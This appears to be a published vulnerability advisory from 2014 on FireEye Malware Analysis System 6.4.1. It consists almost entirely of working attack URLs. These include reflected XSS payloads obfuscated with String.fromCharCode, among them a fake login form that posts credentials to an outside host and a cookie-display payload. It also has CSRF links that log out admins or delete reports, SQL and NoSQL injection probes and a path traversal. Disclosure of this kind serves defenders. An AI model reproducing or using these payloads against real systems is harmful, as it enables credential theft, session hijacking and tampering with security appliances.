FireEye Malware Analysis System (MAS) 6.4.1 - Multiple Vulnerabilities

# Exploit Title: Fireeye Malware Analysis System multiple vulnerabilities
# Google Dork: none
# Date: 06/05/2014
# Exploit Author: kmkz (Bourbon Jean-Marie)
# Vendor Homepage: http://www.fireeye.com/fr/fr/
# Software Link: http://www.fireeye.com/products-and-solutions/
# Version: 6.4.1
# CVE : none

*************************************************************
*[Audit Type] web IHM ONLY / Full black-box audit           *
*                                                           *
*[Multiples Vulnerabilities]                                *
*                                                           *
*   3 XSS (reflected)                                       *
*   1 CSRF                                                  *
*   1 NoSQLi (Json object)                                  *
*   1 PostGreSQL SQLi (Exploitable?)                        *
*   1 File and Path Disclosure                              *
*   1 Source code Info-leak                                 *
*                                                           *
*************************************************************



[*] XSS:
    +First XSS (reflected):
        https://192.168.1.50/yara/show_ya_file?name=<body onload=alert('XSSED')>
    PoC :
        Redirection:
            https://192.168.1.50/yara/show_ya_file?name=<body
onload=document.location=(String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109))>
        Url encoded redirection payload:
            https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.location%3D(String.fromCharCode(104%2C116%2C116%2C112%2C58%2C47%2C47%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C99%2C111%2C109))%3E%0A%09

        Phishing page PoC:
            https://192.168.1.50/yara/show_ya_file?name=<body
onload=document.write(String.fromCharCode(60,104,116,109,108,62,60,98,111,100,121,62,60,104,101,97,100,62,60,109,101,116,97,32,99,111,110,116,101,110,116,61,34,116,101,120,116,47,104,116,109,108,59,32,99,104,97,114,115,101,116,61,117,116,102,45,56,34,62,60,47,109,101,116,97,62,60,47,104,101,97,100,62,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,59,34,62,60,102,111,114,109,32,77,101,116,104,111,100,61,34,80,79,83,84,34,32,65,99,116,105,111,110,61,34,104,116,116,112,115,58,47,47,119,119,119,46,103,111,111,103,108,101,46,114,117,34,62,80,104,105,115,104,105,110,103,112,97,103,101,32,58,60,98,114,32,47,62,60,98,114,47,62,85,115,101,114,110,97,109,101,32,58,60,98,114,32,47,62,32,60,105,110,112,117,116,32,110,97,109,101,61,34,85,115,101,114,34,32,47,62,60,98,114,32,47,62,80,97,115,115,119,111,114,100,32,58,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,80,97,115,115,119,111,114,100,34,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,32,47,62,60,98,114,32,47,62,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,86,97,108,105,100,34,32,118,97,108,117,101,61,34,79,107,32,33,34,116,121,112,101,61,34,115,117,98,109,105,116,34,32,47,62,32,60,98,114,32,47,62,60,47,102,111,114,109,62,60,47,100,105,118,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62))>
        Url encoded phishing page payload:
            https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.write(String.fromCharCode(60%2C104%2C116%2C109%2C108%2C62%2C60%2C98%2C111%2C100%2C121%2C62%2C60%2C104%2C101%2C97%2C100%2C62%2C60%2C109%2C101%2C116%2C97%2C32%2C99%2C111%2C110%2C116%2C101%2C110%2C116%2C61%2C34%2C116%2C101%2C120%2C116%2C47%2C104%2C116%2C109%2C108%2C59%2C32%2C99%2C104%2C97%2C114%2C115%2C101%2C116%2C61%2C117%2C116%2C102%2C45%2C56%2C34%2C62%2C60%2C47%2C109%2C101%2C116%2C97%2C62%2C60%2C47%2C104%2C101%2C97%2C100%2C62%2C60%2C100%2C105%2C118%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C116%2C101%2C120%2C116%2C45%2C97%2C108%2C105%2C103%2C110%2C58%2C32%2C99%2C101%2C110%2C116%2C101%2C114%2C59%2C34%2C62%2C60%2C102%2C111%2C114%2C109%2C32%2C77%2C101%2C116%2C104%2C111%2C100%2C61%2C34%2C80%2C79%2C83%2C84%2C34%2C32%2C65%2C99%2C116%2C105%2C111%2C110%2C61%2C34%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C114%2C117%2C34%2C62%2C80%2C104%2C105%2C115%2C104%2C105%2C110%2C103%2C112%2C97%2C103%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C47%2C62%2C85%2C115%2C101%2C114%2C110%2C97%2C109%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C32%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C85%2C115%2C101%2C114%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C116%2C121%2C112%2C101%2C61%2C34%2C112%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C86%2C97%2C108%2C105%2C100%2C34%2C32%2C118%2C97%2C108%2C117%2C101%2C61%2C34%2C79%2C107%2C32%2C33%2C34%2C116%2C121%2C112%2C101%2C61%2C34%2C115%2C117%2C98%2C109%2C105%2C116%2C34%2C32%2C47%2C62%2C32%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C47%2C102%2C111%2C114%2C109%2C62%2C60%2C47%2C100%2C105%2C118%2C62%2C60%2C47%2C98%2C111%2C100%2C121%2C62%2C60%2C47%2C104%2C116%2C109%2C108%2C62))%3E
    +Second XSS (reflected):
        https://192.168.1.50/network/network?new_domain=%3Cscript%3Ealert%28%27XSSED%27%29%3C%2Fscript%3E
    +Third XSS (reflected):
        https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
Show Cookie PoC:
            https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Ccenter%3E%3Cscript%3Edocument.write%28%22%22%29%3C/script%3E%3Cb%3EUser%20Informations:%3C/b%3E%3Cbr/%3E%3Cscript%3Edocument.write%28document.cookie%29%3C/script%3E%3C/center%3E%3Cpwn

[*] CSRF:

    PoC:
        admin logout:
            https://192.168.1.50/network/network?new_domain=<script>document.location="https://192.168.1.50/login/logout?notice=Deconnection+kmkz+CSRF+PoC"</script>
        Url encoded admin deconnexion PoC:
            https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Flogin%2Flogout%3Fnotice%3DDeconnection%2Bkmkz%2BCSRF%2BPoC%22%3C%2Fscript%3E
        Report deleting:
            https://192.168.1.50/network/network?new_domain=<script>document.location="https://192.168.1.50/report/delete_pdf/?id=Alert_Details_fireye-2F_20140502_120000.xml"</script>
        Url encoded report deleting Poc:
            https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Freport%2Fdelete_pdf%2F%3Fid%3DAlert_Details_fireye-2F_20140502_120000.xml%22%3C%2Fscript%3E
[*] SQLi  PostGreSQL (Exploitable?):
    https://192.168.1.50/event_stream/send_pcap_file?ev_id=9999 OR SELECT 1,2
FROM events /**

    output:
        Event ID '9999 OR SELECT 1,2 FROM events ' could not be retrieved.
Couldn't find Event with id=9999 OR SELECT 1,2 FROM events
    https://192.168.1.50/event_stream/send_pcap_file?ev_id=99999999999   Output:
        Event ID '99999999999' could not be retrieved.
        PG::Error: ERROR: value "99999999999" is out of range for type
integer : SELECT "events".* FROM "events" WHERE "events"."id" = $1 LIMIT 1


[*] Files & Directory Disclosure:
    https://192.168.1.50/malware_analysis/ma_repo : the Input Path field
allow Path & file disclosure ../../../../../../../bin/sh (example)


{*] Others:
    1)No SQLi (Json)
https://192.168.1.50/network/network?new_domain[$ne]=blah
    Return: {"$ne"=>"blah"} is not a valid host // Exploitable?
    2)Source code Info-leak:
        https://192.168.1.50/manual/csc?mode=%3C/script%3E

--
kmkz
PGP: B24EAF34



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information